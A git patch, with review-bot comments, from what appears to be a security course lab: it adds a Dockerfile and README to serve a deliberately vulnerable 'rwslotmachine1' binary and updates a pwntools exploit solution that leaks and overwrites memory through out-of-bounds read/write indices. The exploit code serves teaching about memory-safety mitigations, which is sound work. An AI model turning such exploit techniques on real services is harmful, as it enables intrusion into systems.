From 4d1f4b3b9bc087d9021e7e6ab397c3b216b155c5 Mon Sep 17 00:00:00 2001
From: ClaraStefania
Date: Wed, 11 Dec 2024 23:34:28 +0200
Subject: [PATCH] Add Dockerfile for chapters/mitigations-and-defensive-strategies, 01-rwslotmachine1
Signed-off-by: ClaraStefania
---
 .../01-rwslotmachine1/sol/Dockerfile | 21 +++++++++++++
 .../01-rwslotmachine1/sol/README.md | 12 ++++++++
 .../01-rwslotmachine1/sol/sol_no_nx.py | 30 ++++++++++---------
 3 files changed, 49 insertions(+), 14 deletions(-)
 create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile
 create mode 100644 chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile
new file mode 100644
index 0000000..1af10bb
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/Dockerfile
@@ -0,0 +1,21 @@
+# Stage 1: Build Stage
+FROM gcc:latest AS build
+
+WORKDIR /app
+
+COPY rwslotmachine1.c .
+
+# Compile the C code into an executable
+RUN gcc -Wall -Wextra -O2 -o rwslotmachine1 rwslotmachine1.c
+
+# Stage 2: Runtime Stage
+FROM ubuntu:latest
+
+WORKDIR /app
+
+COPY --from=build /app/rwslotmachine1 /app/rwslotmachine1
+
+EXPOSE 31344
+
+# Run the application
+CMD ["./rwslotmachine1"]
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md
new file mode 100644
index 0000000..6329164
--- /dev/null
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/README.md
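Review bot: In the Dockerfile hunk, both `FROM gcc:latest AS build` and `FROM ubuntu:latest` float, and the `RUN gcc -Wall -Wextra -O2 ...` line sets no mitigation-related flags, so which protections the served binary ends up with (NX, PIE, stack canary) depends on the toolchain defaults of whatever image is pulled on build day. For an activity whose solution file is named `sol_no_nx.py` this should be explicit: pin both stages to a fixed tag or digest and compile with the same flags the activity's own build uses (not visible in this patch). Building on one distribution and running on another can also leave the binary linked against a newer glibc than the runtime image provides, so the two stages should share a base. The container also runs an intentionally vulnerable program as root; adding `RUN useradd -r ctf` and `USER ctf` before `CMD` would limit what a compromise of the service gets inside the container.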
@@ -0,0 +1,12 @@
+## Building and running
+
+1. Build the Dockerfile
+```bash
+docker build -t ransomware1 .
+```
+
+2. Run the Dockerfile
+```bash
+docker run -it -p 31344:31344 ransomware1
+```
+
diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
index 40d3c52..e2eab64 100644
--- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
+++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/01-rwslotmachine1/sol/sol_no_nx.py
@@ -1,6 +1,6 @@
 from pwn import *
-local = False
+local = True
 # Both solutions work against the Docker container instance.
 # Only solution 2 works locally.
 # Solution 1 fails on the local machine because there is no valid address at that index.
@@ -13,21 +13,23 @@
 def do_read(idx):
- p.recvuntil(">")
- p.sendline("1")
- p.recvuntil("index:")
- p.sendline(str(idx))
- p.recvuntil("]: ")
- return int(p.recvuntil("\n")[:-1], 16)
+ p.recvuntil(b">")
+ p.sendline(b"1")
+ p.recvuntil(b"index:")
+ p.sendline(str(idx).encode())
+ p.recvuntil(b"]: ")
+ leak = p.recvline().strip()
+ print(f"Raw Leak: {leak}")
+ return int(leak, 16)
 def do_write(idx, value):
- p.recvuntil(">")
- p.sendline("2")
- p.recvuntil("index:")
- p.sendline(str(idx))
- p.recvuntil("value:")
- p.sendline(hex(value))
+ p.recvuntil(b">")
+ p.sendline(b"2")
+ p.recvuntil(b"index:")
+ p.sendline(str(idx).encode())
+ p.recvuntil(b"value:")
+ p.sendline(hex(value).encode())
 if SOLUTION == 1:
@@ -45,4 +47,4 @@ def do_write(idx, value):
 do_write(-8, stack_slots)
-p.interactive()
+p.interactive()
\ No newline at end of file
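Review bot: `local = True` in the first `sol_no_nx.py` hunk changes the script's default target in a commit whose purpose is to add the container, and the context comments right below it say both solutions work against the Docker instance while only solution 2 works locally. If the flip is a debugging leftover, keep `local = False` so the solution matches the `docker run -it -p 31344:31344 ransomware1` step added in the README. Otherwise extend the comment to say which `SOLUTION` value the new default expects. The code that reads `local` lies outside the hunk.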
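Review bot: `print(f"Raw Leak: {leak}")` in `do_read` is unconditional debug output that prints a bytes repr on every call; since the file already does `from pwn import *`, `log.debug("raw leak: %r", leak)` keeps the value available without cluttering normal runs. `int(leak, 16)` raises `ValueError` when the reply is not a hex value, so a one-line docstring on `do_read` such as `"""Read slot idx and return its value as an int; raises ValueError on a non-hex reply."""` would document that for students reading the solution. A matching docstring on `do_write` would round this out.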